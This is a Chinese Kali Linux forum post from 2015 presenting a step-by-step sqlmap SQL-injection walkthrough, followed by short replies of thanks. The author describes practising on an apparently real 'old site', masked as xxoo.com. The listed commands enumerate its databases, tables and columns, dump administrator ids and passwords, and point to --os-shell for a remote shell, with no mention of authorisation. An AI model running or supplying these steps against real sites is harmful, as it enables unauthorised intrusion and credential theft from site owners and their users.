Kali 中文网

 找回密码
 立即注册

QQ登录

只需一步,快速开始

扫一扫,访问微社区

搜索
查看: 6280|回复: 78

[教程] 【原创】sqlmap实战注入

  [复制链接]
发表于 2015-12-21 23:29:36 | 显示全部楼层 |阅读模式
RAPID7中国区官方授权
0x00:借口
很久不手注了,sqlmap都跨越好几个版本了(just a joke)。基本语法都忘了,找个老站练手,熟能生巧。


0x01:检测注入点
  1. sqlmap -u http://www.xxoo.com/subcat.php?id=2
复制代码

1.检测注入点

1.检测注入点



0x02:列出当前数据库信息
  1. sqlmap -u http://www.xxoo.com/subcat.php?id=2 --dbs
复制代码

2.列出当前数据库信息

2.列出当前数据库信息



0x03:指定该库名列出所有表
  1. sqlmap -u http://www.xxoo.com/subcat.php?id=2 -D databasename --tables
复制代码

获取当前库名称:
  1. sqlmap -u http://www.xxoo.com/subcat.php?id=2 --current-db
复制代码

3.指定该库名列出所有表

3.指定该库名列出所有表



0x04:指定该库名的表名列出所有字段
  1. sqlmap -u http://www.xxoo.com/subcat.php?id=2 -D bible_history -T administrators --columns
复制代码

4.指定该库名的表名列出所有字段

4.指定该库名的表名列出所有字段



0x05:指定库名表名字段dump出指定字段
  1. sqlmap -u http://xxoo.com/subcat.php?id=2 -D databasename -T admin -C id,password --dump
复制代码

5.指定库名表名字段dump出指定字段

5.指定库名表名字段dump出指定字段


取shell啥的就不多说了:--os-shell


最后,附详细教程:
游客,如果您要查看本帖隐藏内容请回复


+1
6359°C
78
  • blackeagle
  • kongjye
  • beyondbeiyang
  • levis_hao
  • wangzai
过: 他们
 楼主| 发表于 2015-12-21 23:32:03 | 显示全部楼层
沙发~         
回复 支持 反对

使用道具 举报

发表于 2015-12-22 14:41:38 | 显示全部楼层
最強姐說快來去看看
回复 支持 反对

使用道具 举报

发表于 2015-12-22 16:56:56 | 显示全部楼层
身份卡通领导人人人人人人人人人人人
回复 支持 反对

使用道具 举报

发表于 2015-12-23 14:43:08 | 显示全部楼层
楼主好牛~~向大神学习~
回复 支持 反对

使用道具 举报

发表于 2015-12-23 17:55:21 | 显示全部楼层
菜鸟来学习
回复 支持 反对

使用道具 举报

发表于 2015-12-24 09:25:30 | 显示全部楼层
感谢分享,努力学习。
回复 支持 反对

使用道具 举报

发表于 2015-12-25 05:26:02 | 显示全部楼层
最強姐說快來去看看
回复 支持 反对

使用道具 举报

发表于 2015-12-25 23:32:16 | 显示全部楼层
赞一个,赞赞赞赞赞
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

关闭

站长推荐上一条 /1 下一条

手机版|Kali linux ( 蜀ICP备10027298号-4 ) Topics |


免责声明:
Kali linux中文网所发布的一切教程文章仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。

GMT+8, 2017-1-19 22:56 , Processed in 0.209128 second(s), 24 queries , Gzip On.

Powered by Discuz!

© 2009-2016 CNNS

快速回复 返回顶部 返回列表